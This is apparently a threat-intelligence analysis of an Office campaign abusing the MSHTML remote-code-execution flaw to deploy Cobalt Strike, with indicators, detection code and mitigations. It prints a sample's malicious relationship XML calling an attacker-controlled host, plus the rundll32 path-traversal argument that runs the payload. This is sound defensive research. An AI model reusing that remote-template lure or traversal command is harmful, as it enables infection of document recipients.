Following several attacks targeting the RCE flaw in MSHTML, CloudSEK Threat Intelligence Research team shares the TTPs and IOCs of the attack sequence.
The MSHTML (Microsoft HTML) engine, also known as Trident, is the browser engine Microsoft developed for Internet Explorer. The Microsoft Office suite also embeds MSHTML, and threat actors are abusing it to gain code execution on targeted systems. The attacker crafts a malicious ActiveX control and references it from a Microsoft Office document that hosts the browser rendering engine, then persuades the victim to open the document, which in turn triggers the logic flaw in MSHTML. These malicious documents are delivered via Office 365.

By default, documents downloaded from the Internet are opened in Protected View or Application Guard for Office, both of which defend against this attack. However, if the user bypasses these mitigations and allows the content to load, the target machine is exploited and malware agents such as the Cobalt Strike Beacon are deployed. Microsoft Defender for Endpoint has been updated to flag such attacks with an alert that reads: "Suspicious Cpl File Execution."

Given the quality of the vulnerability research and the scale at which users are being targeted, an advanced adversary is most likely responsible for the ongoing campaign. The CloudSEK Threat Intelligence Research team obtained malicious artifacts and extracted the TTPs (Tactics, Techniques, and Procedures) used by the adversaries leveraging the MSHTML RCE bug, in order to provide better security for our clients. This report provides a technical analysis of the campaign. Specifics of the exploit for the vulnerability have been intentionally withheld to avoid misuse in the public domain, as a large number of systems remain susceptible.

Microsoft Word and Excel documents are ZIP archives of XML files that retain the information and data the user provided while creating the document in the corresponding Office application. In simple words, one can unzip a .docx file to see the internal XML files that contain various metadata. The directory "word/_rels" in an unzipped Word file (its counterpart in Excel is "xl/_rels") plays a very significant role in weaponizing a seemingly benign document.
The process by which users are attacked via the Trident vulnerability

The '_rels' directory stores relationship metadata, which Office uses to fetch the template a document depends on when the document is loaded. The Target of a relationship can be an SMB address or HTTP URL of an asset controlled by the attacker, which is then used to deliver the malicious payload. To find the remote template injection vector, search the relationship XML for elements whose TargetMode attribute is set to "External". In this case, the malicious URL is the value of the Target attribute of that external relationship. Office then downloads the file that the URL points to.

```xml
<?xml version="1.0" encoding="UTF-8" standalone="true"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Target="theme/theme1.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Id="rId8"/>
  <Relationship Target="webSettings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Id="rId3"/>
  <Relationship Target="fontTable.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Id="rId7"/>
  <Relationship Target="settings.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Id="rId2"/>
  <Relationship Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Id="rId1"/>
  <Relationship Target="mhtml:http://hidusi.com/e8c76295a5f9acb7/side.html!x-usc:http://hidusi.com/e8c76295a5f9acb7/side.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Id="rId6" TargetMode="External"/>
  <Relationship Target="media/image2.wmf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/>
  <Relationship Target="media/image1.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/>
</Relationships>
```

Remote template injection used in the obtained Trident campaign samples

The malicious .docx sample, when opened, loads a webpage named 'side.html', hosted on an attacker-controlled server, via remote template injection. Since the campaign targets the MSHTML engine that Office supports, loading the HTML document occurs naturally.
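The relationship check described above, as an added triage example that is not part of the original report or the campaign sample: it unzips a document in memory, walks the word/_rels and xl/_rels parts, and reports external oleObject/attachedTemplate relationships whose Target uses the mhtml:/x-usc: wrapper or another remote scheme (external hyperlinks are normal and are left alone). The sample package and the attacker.invalid host are constructed placeholders.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# Relationship parts of Word and Excel packages (word/_rels/*.rels, xl/_rels/*.rels).
RELS_PART = re.compile(r"^(word|xl)/_rels/.*\.rels$")
# Relationship types that pull a remote document into the rendering engine.
REMOTE_LOAD_TYPES = {"oleObject", "attachedTemplate"}
# Schemes worth flagging: the mhtml:/x-usc: wrapper from the sample, plus plain web/UNC.
SUSPICIOUS_SCHEME = re.compile(r"^(mhtml:|x-usc:|https?://|file://|\\\\)", re.IGNORECASE)

# Constructed relationship part modelled on the campaign sample; the host is a placeholder.
SAMPLE_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
 <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
 <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://attacker.invalid/x/side.html!x-usc:http://attacker.invalid/x/side.html" TargetMode="External"/>
</Relationships>"""

def build_sample_docx() -> bytes:
    """Build a minimal .docx (a ZIP package) in memory that carries SAMPLE_RELS."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()

def find_external_targets(docx_bytes: bytes) -> list:
    """Return (part, rId, short type, Target) for every relationship with TargetMode="External"."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not RELS_PART.match(name):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((name, rel.get("Id"), short_type, rel.get("Target", "")))
    return hits

def is_remote_template_injection(hit) -> bool:
    """External hyperlinks are normal; an external oleObject/attachedTemplate with a remote scheme is not."""
    _part, _rid, short_type, target = hit
    return short_type in REMOTE_LOAD_TYPES and bool(SUSPICIOUS_SCHEME.match(target))
```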
HTML contents of the malicious webpage ‘side.html’
A section of the deobfuscated exploit code
The cabinet file is retrieved from a remote URL, and the INF file inside it is written to one of the directories listed in the image below. The exploit code abuses directory traversal to execute the Cobalt Strike CPL beacon, which masquerades as 'champion.inf'.
A section of the deobfuscated exploit code
The CPL payload 'champion.inf' is eventually executed by 'rundll32.exe' with the following argument: '.cpl:../../../AppData/Local/Temp/Low/championship.inf'

A basic image analysis shows that the 'champion.inf' file is in fact a 64-bit DLL (Dynamic Link Library); its first two bytes are the "MZ" signature of a Windows executable. A CPL file is a Control Panel item that has code execution capabilities. A DLL becomes a CPL when it exports a particular function named 'CplApplet', and it can be readily executed like any other PE (Portable Executable).

Image analysis of 'champion.inf'

Windows Defender flags this as "Trojan:Win32/Agent.SA", and other security solutions flag it as "Trojan.Win64.COBEACON.SUZ".
When the exploit code successfully triggers the vulnerability to gain remote code execution, the payload deployed is a Cobalt Strike beacon, as discussed above. CloudSEK researchers recreated the exploit code and ran it to get a better understanding of the vulnerability. The researchers used Process Monitor to analyse the execution flow of the Office document (WINWORD.EXE) and found a few interesting results, which are shared below.
Microsoft Word application loads mshtml.dll from Windows Directory. The vulnerability resides in one of the functionalities defined in the DLL files.
Windows Directory DLL files
Based on CloudSEK's testing, mshtml.dll is not loaded into WINWORD.EXE by default. When the attacker delivers an exploit written in HTML via remote template injection, the handler given in the Target attribute is mhtml:. This causes the mshtml module to be loaded into the Word process to render the HTML page within the Word document.

The final payload, championship.inf, is extracted from the initial ministry.cab archive and written to the Temp directory. This is probably caused by the vulnerability, which adversaries abuse to write user-controlled data to disk.

CloudSEK researchers also identified multiple control.exe processes that are spawned to execute the given CPL payload. Each of these processes searches for the champion.inf file in directories that are hardcoded in the exploit. Here is a list of the hardcoded directories to which the payload is dropped.

The command lines passed to control.exe are shown in the image below. The argument provided is the location of the final payload, which is eventually executed by rundll32.
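The process chain described above (Word spawning control.exe, which hands a traversing .cpl: argument to rundll32.exe) lends itself to a simple endpoint detection. The following is an added example, not part of the original report, that runs three rules over constructed Sysmon-style process-creation records; the event field names and the Control_RunDLL command-line form are assumptions, not data from the page.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry); the
# command lines mirror the control.exe / rundll32.exe chain described above.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" ".cpl:../../../AppData/Local/Temp/Low/championship.inf"'},
    {"ParentImage": r"C:\Windows\System32\control.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" Shell32.dll,Control_RunDLL ".cpl:../../../AppData/Local/Temp/Low/championship.inf"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\control.exe",
     "CommandLine": r'"C:\Windows\System32\control.exe" /name Microsoft.System'},
]

OFFICE_HOSTS = {"winword.exe", "excel.exe"}
CPL_HOSTS = {"control.exe", "rundll32.exe"}
# A .cpl: argument that walks up with ../ or ..\ is the traversal used by the exploit.
CPL_TRAVERSAL = re.compile(r"\.cpl:\S*?(\.\./|\.\.\\)", re.IGNORECASE)
# A Control Panel item loaded as an .inf file out of a Temp directory.
INF_IN_TEMP = re.compile(r"[\\/]Temp[\\/](Low[\\/])?[^\s\"]+\.inf", re.IGNORECASE)

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event: dict) -> list:
    """Return the detection names that fire for one process-creation event (empty if benign)."""
    parent, image = _basename(event["ParentImage"]), _basename(event["Image"])
    cmd = event["CommandLine"]
    reasons = []
    if parent in OFFICE_HOSTS and image in CPL_HOSTS:
        reasons.append("office-spawned-cpl-host")
    if image in CPL_HOSTS and CPL_TRAVERSAL.search(cmd):
        reasons.append("cpl-path-traversal")
    if image in CPL_HOSTS and INF_IN_TEMP.search(cmd):
        reasons.append("cpl-payload-from-temp-inf")
    return reasons

def triage(events: list) -> list:
    """Return (index, reasons) for every event that triggers at least one detection."""
    out = []
    for i, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            out.append((i, reasons))
    return out
```

The benign control.exe launch from Explorer in the third record produces no hit, which is the false-positive case a production rule has to keep clean.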
Based on the official guidelines posted by Microsoft, Windows users need to follow the instructions given below:
- Disable ActiveX via Group Policy*
- Disable ActiveX on individual systems via registry
- Disable shell preview in Windows Explorer
- Enterprise customers who manage updates should select the detection build 1.349.22.0
*Disabling ActiveX on Windows systems will have side effects depending on the user environment. For detailed information, refer to the official documentation issued by Microsoft.